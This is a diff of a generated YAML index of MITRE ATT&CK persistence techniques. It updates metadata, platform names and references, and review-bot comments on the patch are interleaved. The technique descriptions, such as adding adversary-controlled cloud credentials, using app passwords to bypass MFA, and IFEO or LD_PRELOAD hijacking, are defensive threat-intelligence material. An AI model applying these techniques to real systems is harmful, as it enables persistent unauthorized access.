+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1505.003:
@@ -30738,12 +31161,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30758,6 +31180,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -30766,18 +31189,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -30809,9 +31232,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -30883,7 +31303,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -30910,7 +31329,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -30936,13 +31355,11 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -31063,7 +31480,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1136.001:
@@ -31135,7 +31551,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests: []
T1547.004:
@@ -31205,7 +31620,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -31315,7 +31729,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -31369,7 +31782,7 @@ persistence:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -31402,8 +31815,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1574.005:
@@ -31434,7 +31845,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -31469,12 +31880,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31551,7 +31960,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1136.002:
@@ -31605,7 +32013,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests: []
T1542.002:
@@ -31637,7 +32044,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31667,55 +32074,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
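Review bot: the 45 removed lines for T1137.001 (`x_mitre_platforms`, `x_mitre_domains`, `id`, `created`, the whole `external_references` list) are not deleted but re-emitted further down in a different key order, so this hunk can only be reviewed together with the `@@ -31765,11 +32132,47` hunk. If the generator emitted keys in a stable order the diff would shrink to the real changes: the `modified` date, `Office 365` becoming `Office Suite`, and the version bump. Separately, the unchanged name `'Office Application Startup: Office Template Macros.'` ends with a period that no other technique name in this file carries; it is upstream data, but worth flagging there.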
@@ -31746,6 +32108,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -31755,9 +32118,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -31765,11 +32132,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests: []
T1546.009:
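Review bot: `x_mitre_permissions_required` (`User`, `Administrator`) is dropped for T1137.001 with no replacement, whereas the other keys removed in this hunk (`spec_version`, `x_mitre_attack_spec_version`) come back in the `+` lines with the spec version raised from 2.1.0 to 3.2.0. The removal is not uniform across the patch either, since T1547.015 and T1205.001 keep the field, so anything that reads `x_mitre_permissions_required` from this index should be checked before merging.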
@@ -31801,7 +32204,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31849,13 +32252,11 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31868,16 +32269,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -31889,16 +32290,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
@@ -31953,7 +32354,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -32014,7 +32414,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -32090,7 +32489,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -32118,8 +32517,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1205.001:
@@ -32145,7 +32542,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -32170,23 +32567,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -32196,11 +32591,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -32211,12 +32610,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -32225,6 +32631,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -32233,13 +32640,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -32265,10 +32675,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
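Review bot: the new `Lacework AI Resource Hijacking 2024` entry puts the title before the author (`Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs.`), unlike the surrounding references, which lead with the author name; the adjacent `Permiso Scattered Spider 2023` entry follows the usual order. This is upstream ATT&CK text, so correct it at the source rather than in the generated file.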
@@ -32277,10 +32695,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -32297,14 +32725,11 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -32379,7 +32804,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -32468,24 +32892,27 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
